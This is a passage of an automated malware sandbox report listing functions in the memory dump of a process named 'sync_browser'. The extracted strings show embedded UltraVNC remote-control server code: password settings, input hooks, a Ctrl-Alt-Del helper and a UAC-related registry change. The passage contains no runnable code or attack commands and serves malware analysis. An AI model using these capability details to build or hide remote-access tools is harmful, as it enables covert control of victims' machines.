                                                                      • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                      • API String ID: 341937111-959611688
                                                                      • Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                                      • Instruction ID: 953897ef8bc2de10162f2b376c44dda51640dbc91ecfb35ac80c36fe1b2679a8
                                                                      • Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                                      • Instruction Fuzzy Hash: 58C2CE65A08A4F91EF10AB59F8646E4A760FB44FD8FC05433D90D9752CEE7CE209C7A2
                                                                      Function 00007FF7E50A3E20 Relevance: 158.0, APIs: 55, Strings: 35, Instructions: 537libraryloaderthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
                                                                      • String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
                                                                      • API String ID: 3632263120-2889214834
                                                                      • Opcode ID: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
                                                                      • Instruction ID: 4d29024308a823771279c81fad68d96b3fc09075cb328013a8cafc6930939044
                                                                      • Opcode Fuzzy Hash: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
                                                                      • Instruction Fuzzy Hash: 8C527135A08A8A85E710EF64F9647AAB3A8FF44B54F800537DA4DC3698DF3CE544C722
                                                                      Function 00007FF7E50C0650 Relevance: 100.3, APIs: 37, Strings: 20, Instructions: 597COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ************** DEAD KEY$ Compose dead 0x%x 0x%x$ Composed 0x%x$ Found key$ SHORT s %i$ Simulating ALT+%d%d%d$ keysym 0x%x$CAD$Not Vista and runnning as system, use old method$Not Vista and runnning as user -> Taskmgr$Vista and runnning as system -> CAD$Vista and runnning as user -> Taskmgr$down$fake %d down$fake %d up$gfff$ignoring unknown keysym %d$ignoring unrecognised Latin-1 keysym 0x%x$latin-1 key: keysym %d(0x%x) vkCode 0x%x down %d capslockOn %d$taskmgr.exe
                                                                      • API String ID: 0-2541672151
                                                                      • Opcode ID: 4de62e545ccc4938766ca3ab5845fa14ab1c878863e4d7865b5c773306dab41b
                                                                      • Instruction ID: 02a55ee811b5f61fc40a0657cbaf5a1bfaa441b4e1f30bb4af1d6b11ca54d6ea
                                                                      • Opcode Fuzzy Hash: 4de62e545ccc4938766ca3ab5845fa14ab1c878863e4d7865b5c773306dab41b
                                                                      • Instruction Fuzzy Hash: E3527E21E1868A86F724BB34E4307F9A761BB41B48FC05437E94E87699DE3CA549C373
                                                                      Function 00007FF7E508A130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                      • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                      • API String ID: 1732492099-311746058
                                                                      • Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                                      • Instruction ID: d45545f6ff2ad8697ffb18476473a1988b51828ae7e1631d52836c2e6e98e351
                                                                      • Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                                      • Instruction Fuzzy Hash: CCF1A631A08B4A85EB20EB24F8647A9B3A5FF44B64F840137D95D87B98DF3CE515C722
                                                                      Function 00007FF7E50820E0 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 241sleeplibrarysynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                                      • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                                      • API String ID: 767217470-2348971971
                                                                      • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                      • Instruction ID: 0bb3056cb3ca6e52b8abad5b0f4aabbe3c9dfee5ae8ebfbca1af60faf40313cc
                                                                      • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                      • Instruction Fuzzy Hash: 91C18F24A09B4B82EA64BB61B870779A3A4FF84F50F841137D95E87298DF3CA445C732
                                                                      Function 00007FF7E509F980 Relevance: 65.1, APIs: 20, Strings: 17, Instructions: 347libraryloaderwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                                      • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                                      • API String ID: 3851920378-1343955350
                                                                      • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                      • Instruction ID: 5cdec093bfa4fd6c34afb0bad76ecf6405e66bafe4e1046631792b70416c300e
                                                                      • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                      • Instruction Fuzzy Hash: 71023D726086CA86E710AF28E4607A9B7A1FB85F48F845437DA4D9769CDF3CD405C732
                                                                      Function 00007FF7E5088980 Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 264registrythreadlibraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                                      • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                      • API String ID: 4207610217-3713657650
                                                                      • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                      • Instruction ID: 2ef9de58085a295dc479e042ce3a5dffd26fea663b919621cbfeb2cf48811d98
                                                                      • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                      • Instruction Fuzzy Hash: 44C1A661A18A4A85EB60EB24F8207B9A7A4FF84F84FC45437EA4D87698EF3CD105C711
                                                                      Function 00007FF7E508A890 Relevance: 61.5, APIs: 28, Strings: 7, Instructions: 227threadwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
                                                                      • String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
                                                                      • API String ID: 384463373-239428621
                                                                      • Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                      • Instruction ID: 640d93e90d292fb30966bd4cd4ca1129627b7fc4be29a74c7fba35c41c28c98d
                                                                      • Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                      • Instruction Fuzzy Hash: A5B1CA31A0CA4A82E730AB24F4607B9A350FF84F60F945133D65E87A98EF3CE445C762
                                                                      Function 00007FF7E5088E10 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 272registrythreadlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                                      • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                      • API String ID: 27940619-3388178877
                                                                      • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                      • Instruction ID: b7dca72405105037753669e02c83f859bcef7eddd9265e7a0807e1316539ad3a
                                                                      • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                      • Instruction Fuzzy Hash: 0EC1E631A0868A95EB20EF35B4607B9B7A1FF44F44F944436EA4E8B659EF3CE504C711
                                                                      Function 00007FF7E512A228 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                                      • String ID: ./\
                                                                      • API String ID: 385398445-3176372042
                                                                      • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                      • Instruction ID: 70dcea8ab5b55e8a33d7965dfe2ec2ecf751d7fa06c8147260b3be83d0e1c521
                                                                      • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                      • Instruction Fuzzy Hash: DEE1982690C28AC6E760AF10B07437EF7A0FB45F40F944036E68D96689DF7DE854DB22
                                                                      Function 00007FF7E5071DD0 Relevance: 45.3, APIs: 30, Instructions: 281clipboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Clipboard$CloseEmptyOpen
                                                                      • String ID:
                                                                      • API String ID: 1427272684-0
                                                                      • Opcode ID: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                      • Instruction ID: 4e70849872919aee896626a4cb56af0a462dc89a8537489b0eb6ff6263f6e749
                                                                      • Opcode Fuzzy Hash: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                      • Instruction Fuzzy Hash: 1CC16221B0974A96EA20BF65E4643BDA3A1BF45F84F845036DE0E87795EF3CE404C762
                                                                      Function 00007FF7E509E780 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 204libraryloadertimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
